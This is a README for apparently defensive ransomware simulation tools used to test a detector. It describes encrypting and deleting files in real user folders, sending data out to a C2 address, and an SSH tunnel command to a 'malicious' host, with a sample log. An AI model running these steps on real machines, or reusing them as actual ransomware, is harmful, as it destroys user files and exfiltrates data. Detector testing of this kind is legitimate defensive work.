Skip to content

README.md

Latest commit

 

History

History
136 lines (98 loc) · 3.77 KB

README.md

File metadata and controls

136 lines (98 loc) · 3.77 KB

Ransomware Simulation Tools

Overview

This directory contains tools for simulating ransomware behavior to test the ransomware detector system.

⚠️ WARNING: These scripts are for TESTING PURPOSES ONLY! No real data is transmitted.

⚠️ WARNING: Using these tools may corrupt your system or user files if misconfigured. Using these tools is at your own risk.

Quick Start

Step 1: Start C2 Server (to receive exfiltration data)

cd tools\simulation
python c2_server.py

Step 2: Run Ransomware Simulation (in another terminal)

simulate_ransomware.bat --encrypt

Decrypt Files

simulate_ransomware.bat --decrypt

Interactive Menu

simulate_ransomware.bat

Main Features

Option 1: Encrypt Directory

  • Phase 1: Simulates data exfiltration to C2 server (185.243.115.47:4444)
  • Phase 2: Encrypts all test files with AES-256-CBC encryption
  • Adds .WCRY extension to encrypted files

Option 2: Decrypt Directory

  • Restores all encrypted files to their original state
  • Removes .WCRY extensions

Option 3: Simulate Data Exfiltration Only

  • Runs network exfiltration simulation without encrypting files
  • Simulates SSH tunnel, DNS lookup, and C2 communication

What Gets Simulated

Network Activity (Phase 1 - ~10 seconds)

  • DNS lookup to suspicious IP (185.243.115.47)
  • SSH tunnel creation: ssh -D 9050 -N -f malicious@185.243.115.47
  • SOCKS5 proxy on port 9050
  • Base64 encoding of victim data
  • Chunked data transmission (1856 bytes in 4 chunks)
  • C2 server acknowledgment with Bitcoin payment address
  • Ransom note template download

File System Activity (Phase 2 - 10-60 seconds)

  • Recursive file scanning
  • AES-256-CBC encryption of target files
  • Extension changes to .WCRY
  • Original file deletion

Configuration

Edit the configuration section in simulate_ransomware.bat:

C2_IP=185.243.115.47      # Suspicious IP (known malicious range)
C2_PORT=4444              # Common C2 port
TUNNEL_PORT=9050          # SOCKS5/TOR port
PRIVATE_KEY=MySecretPassword123!PleaseChange

Files

  • create_test_directory.bat - Creates test files in actual user folders (Documents, Pictures, Music, etc.)
  • simulate_ransomware.bat - Main simulation script

These are auxiliary files used by the main scripts:

  • create_files_parallel.ps1 - PowerShell file generator
  • c2_server.py - Python C2 server to receive exfiltrated data
  • exfiltrate.ps1 - PowerShell script for network exfiltration
  • verify_setup.bat - Verification script (checks all components)
  • test_exfiltration.bat - Quick test script

Testing Procedure

  1. Start RansomwareDetector

    python run.py

  2. Run Simulation

    cd tools\simulation
simulate_ransomware.bat --encrypt

  3. Check Alerts - Verify both network and file system detections

  4. Clean Up

    simulate_ransomware.bat --decrypt

File Types Targeted

Documents, Images, Audio/Video, Archives, Databases, Source Code: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .txt, .jpg, .png, .mp3, .mp4, .zip, .rar, .sql, .db, and more.

Log File

Check exfiltration_simulation.log for activity logs:

[12/14/2025 14:30:15] SSH tunnel established to 185.243.115.47:4444
[12/14/2025 14:30:18] Transmitted 1856 bytes to 185.243.115.47:4444
[12/14/2025 14:30:20] C2 server confirmed key reception

Future Improvements

  • For now, simulated network activity is for concept representation only. Future versions may include more realistic network traffic patterns.

Legal Disclaimer

These tools are for legitimate security testing only. Unauthorized use is illegal and unethical.

All network activities are SIMULATED - No real data is transmitted!